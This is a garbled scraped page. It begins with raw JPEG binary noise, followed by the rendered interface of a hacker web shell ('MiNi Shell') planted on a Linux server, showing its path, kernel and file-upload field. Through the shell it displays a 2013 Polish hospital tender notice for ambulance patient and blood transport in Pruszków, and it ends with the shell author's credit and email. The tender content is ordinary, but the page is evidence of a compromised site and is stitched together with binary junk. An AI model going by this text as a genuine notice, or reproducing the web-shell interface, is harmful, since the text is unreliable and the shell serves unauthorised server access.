JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130103/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130103/1717-N-2013.html

<p class="kh_header"><b>Pruszków: usługę transportu karetką transportową T z sanitariuszem i bez sanitariusza pacjentów Szpitala Kolejowego w Pruszkowie</b><br>
<b>Numer ogłoszenia: 1717 - 2013; data zamieszczenia: 03.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Kolejowy im. dr med. Wł. Roeflera SP ZOZ , ul. Warsztatowa 1, 05-800 Pruszków, woj. mazowieckie, tel. 22 77 09 308, faks 22 77 09 308.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługę transportu karetką transportową T z sanitariuszem i bez sanitariusza pacjentów Szpitala Kolejowego w Pruszkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia  jest wykonywanie przez Wykonawcę  usług w zakresie transportu pacjentów  przy użyciu karetki transportowej T, zgodnie z ustawą z dnia 27 sierpnia 2004r. o świadczeniach zdrowotnych finansowanych ze środków publicznych oraz aktami wykonawczymi do tej ustawy, w następujących przypadkach:
a)	przewozu pacjentów do domu po zakończonej hospitalizacji 
b)	przewozu pacjentów do domu po udzieleniu porady w  Izbie Przyjęć
c)	przewozu pacjentów hospitalizowanych na badania do innych placówek leczniczych lub diagnostycznych
d)	przewozu pacjentów z Izby Przyjęć do innych placówek leczniczych
e)	przewozu materiału do badań diagnostycznych do innych placówek
f)	transportu krwi i preparatów krwiopochodnych z Regionalnego Centrum Krwiodawstwa i Krwiolecznictwa z Warszawy
2.	Skład osobowy karetki : kierowca i sanitariusz bądź kierowca bez sanitariusza - w zależności od zapotrzebowania Zamawiającego.
3.	Usługa transportu sanitarnego z sanitariuszem lub bez sanitariusza będzie  świadczona co najmniej   
              dwoma karetkami. 
            Jedna karetka od poniedziałku do piątku w godz. 7.00-15.00 lub od 7.00-19.00 w razie potrzeb   oraz druga 
             karetka  we wszystkie dni  tygodnia -  także w niedziele, święta i dni wolne od pracy, na zlecenie 
             telefoniczne złożone  przez   Zamawiającego. 
4.	Transport krwi realizowany będzie w trybie zwykłym i - na ratunek- od poniedziałku do piątku oraz w dni wolne od pracy i święta przez 24h na każdorazowe wezwanie telefoniczne. Transport -na ratunek-to rodzaj transportu, którego nie można zaplanować, ani przewidzieć, a jego natychmiastowa realizacja jest konieczna. Pozostały transport odbywać się będzie w trybie zwykłym. O trybie realizacji usługi decyduje Zamawiający. 
5.	Zgłoszenie  telefoniczne potwierdzone zostanie pisemnym  zleceniem na przewiezienie chorego lub zlecenie na transport krwi i preparatów krwiopochodnych lub materiału do badań diagnostycznych ( w zależności od zapotrzebowania) doręczonym pracownikowi Wykonawcy przed rozpoczęciem realizacji przewozu (załącznik nr 5 ).
6.	Wykonawca musi posiadać sprawny technicznie tabor samochodowy, dostosowany do przewozu pacjentów (samochody ogrzewane, dostosowane do przewozu osób starszych, niesprawnych ruchowo i niewidomych) w ilości zapewniającej zrealizowanie umowy (minimum dwie karetki) . Pojazdy nie starsze niż 4 lata.
7.   Pojazdy do transportu pacjentów muszą spełniać cechy techniczne i jakościowe określone w obowiązującej   
      Polskiej  Normie PN-EN 1789 dla środka transportu drogowego typu A, a w przypadku zmiany  
      obowiązującej normy w nowoobowiązującej normie. 
8.   Pojemniki do transportu krwi znajdujące się na wyposażeniu Wykonawcy muszą posiadać dokumenty w    
       postaci protokołów walidacji dopuszczenia do użytkowania, zgodnie z obowiązującymi przepisami.
9.    Przewidywany czas oczekiwania na karetkę od momentu zgłoszenia do przyjazdu do Zamawiającego  nie    
       powinien przekroczyć 30 min. W przypadku gdy Wykonawca nie będzie w stanie wywiązać się z 
       podstawienia transportu w czasie 30 minut, Zamawiający zastrzega sobie prawo do wezwania innego 
      transportu na koszt  Wykonawcy Podstawienie pojazdów transportowych również nie może przekraczać    
30	minut.
10. Kwalifikacje personelu:   
       Sanitariusz - posiadający wykształcenie średnie,  zaświadczenie o odbyciu szkolenia w zakresie pierwszej 
       pomocy przedlekarskiej, posiadający aktualną pracowniczą książeczką zdrowia dla celów sanitarno-
       epidemiologicznych
       Kierowca  -  posiadający prawo jazdy  kategorii B, aktualną pracowniczą książeczką zdrowia   
      dla celów sanitarno-epidemiologicznych, zaświadczenie o odbyciu szkolenia w zakresie pierwszej pomocy,     
      spełnia wymogi ustawy z dnia 20.06.1997r.  Prawo ruchu drogowego, wyposażony w  środki łączności - 
      minimum telefon komórkowy lub inną łączność bezprzewodową.

Ponadto: 
1. Wykonawca określi  telefony kontaktowe i numery fax. oraz inne ustalenia niezbędne dla sprawnego i 
    terminowego wykonania zamówienia.  
2. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas  wykonywania       
    przedmiotu zamówienia.   3. Zamawiający nie dopuszcza możliwości składania ofert częściowych.
4. Zamawiający nie dopuszcza możliwości składania ofert wariantowych  i  równoważnych.  5. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej  6  Zamawiający  dopuszcza możliwość powierzenia przez wykonawcę wykonania części  lub całości    
    zamówienia podwykonawcom. W przypadku powierzenia zamówienia podwykonawcy wymaga się 
    wskazania w ofercie , w jakiej części Wykonawca zamierza powierzyć wykonanie zamówienia     
    podwykonawcy. W przypadku powierzenia wykonania zamówienia lub jego części podwykonawcy,    
    Wykonawca odpowiada za  działania podwykonawcy jak za działania własne. Podwykonawca  do realizacji 
    zamówienia musi posiadać  wszystkie uprawnienia zgodnie z wymogami prawa.
7. Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 30% 
      wartości zamówienia podstawowego.
 
czas wykonywania świadczeń	Opis wykonywanego świadczenia	Jednostka miary	ilość  szacunkowa w skali miesiąca

w dni: pon - piąt. w godz. 7.00-15.00 lub 7.00-19.00 w zależności od potrzeb	

      Transport medyczny bez sanitariusza	km	3 500
		godz.	175
w dni: pon - piąt. , soboty, niedziele i święta całodobowo	
Transport medyczny bez sanitariusza :                                  	km	3 440
w dni: pon - piąt. , soboty, niedziele święta całodobowo	Transport medyczny z sanitariuszem :                                  	km	1865.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zamówienie uzupełniające do 30 % zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek opisany w pkt.5.1. Zamawiający uzna za spełniony, jeżeli Wykonawca złoży oświadczenie o     
    spełnianiu warunków udziału w postępowaniu, stanowiące załącznik Nr 7 do siwz.  Zamawiający nie    
    wyznacza   szczegółowego warunku w tym zakresie.

Ocena spełniania warunku metodą spełnia nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek opisany w pkt. 5.2. Zamawiający uzna za spełniony, jeżeli Wykonawca złoży oświadczenie -    
     załącznik nr 7

Ocena spełniania warunku metodą spełnia nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek określony w pkt.5.3. za spełniony jeżeli Wykonawca posiada odpowiednie środki    
    techniczne czyli Wykonawca musi posiadać lub dysponować wystarczającą ilością samochodów (karetek T)     
    - minimum dwie karetki,  przystosowanymi do transportu pacjenta. Należy załączyć wykaz taboru     
    samochodowego - załącznik nr 6.
Oświadczenie, że pojazdy spełniają cechy techniczne i jakościowe określone w obowiązującej Polskiej 
    Normie dla środka  transportu drogowego typu A2.
3)  kopia dowodów rejestracyjnych z pieczęcią zawierającą datę ważności przeglądu technicznego.
Ocena spełniania warunku metodą spełnia nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek, jeżeli wykonawca złoży 


oświadczenie, że personel posiada kwalifikacje oraz uprawnienia niezbędne do wykonywania 
     przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa ( dołączyć  potwierdzenie szkoleń, 
     kopia prawa jazdy)
Ocena spełniania warunku metodą spełnia nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek opisany w pkt. 5.4., jeżeli Wykonawca zawarł    umowę    
    ubezpieczenia z tytułu szkód , które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz    
    ubezpieczenia odpowiedzialności cywilnej i NW w zakresie prowadzonej działalności gospodarczej na czas 
    realizacji umowy. Ubezpieczenie od NW musi obejmować obsadę karetki oraz pacjenta.     
    Należy złożyć w ofercie opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego,  że      
    Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
    z przedmiotem zamówienia.
Ocena spełniania warunku metodą spełnia nie spełnia na podstawie złożonych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1
2) Cennik usług transportowych - załącznik nr 1 do oferty
3) Parafowany wzór umowy - załącznik nr 2
4)Parafowane miesięczne zestawienie wyjazdów- załącznik nr 3
5) Oświadczenie o przedłożeniu  polisy, po wygaśnięciu dotychczasowej, ważnej zgodnie z obowiązującymi 
    przepisami   - załącznik nr 4
6)Parafowane zlecenie na transport pacjenta, krwi i preparatów krwiopochodnych, materiałów do badań    
     diagnostycznych - załącznik nr 5
7) Dokumenty potwierdzające posiadanie pełnomocnictwa osób składających ofertę, o ile nie wynika to z      
    przedstawionych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający przewiduje zmiany w treści zawartej umowy w zakresie :
1)	Skrócenia terminu obowiązywania umowy po warunkiem wystąpienia sytuacji nie  przewidzianej  niniejszą umową  
2)	Obniżenia cen przedmiotu zamówienia pod warunkiem zgody obu stron  umowy, w przypadku zmniejszenia cen rynkowych.
3)	Zmiany stawek podatku VAT i wynikające z tego zmiany w treści zawartej umowy, w tym zmiany  
cen brutto w stopniu wynikającym ze zmian stawek podatku VAT nie stanowią zmian w treści umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Kolejowy SP ZOZ  w Pruszkowie, ul. Warsztatowa 1 pokój zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2013 godzina 10:30, miejsce: Szpital Kolejowy SP ZOZ  w Pruszkowie, ul. Warsztatowa 1 pokój zamówień publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com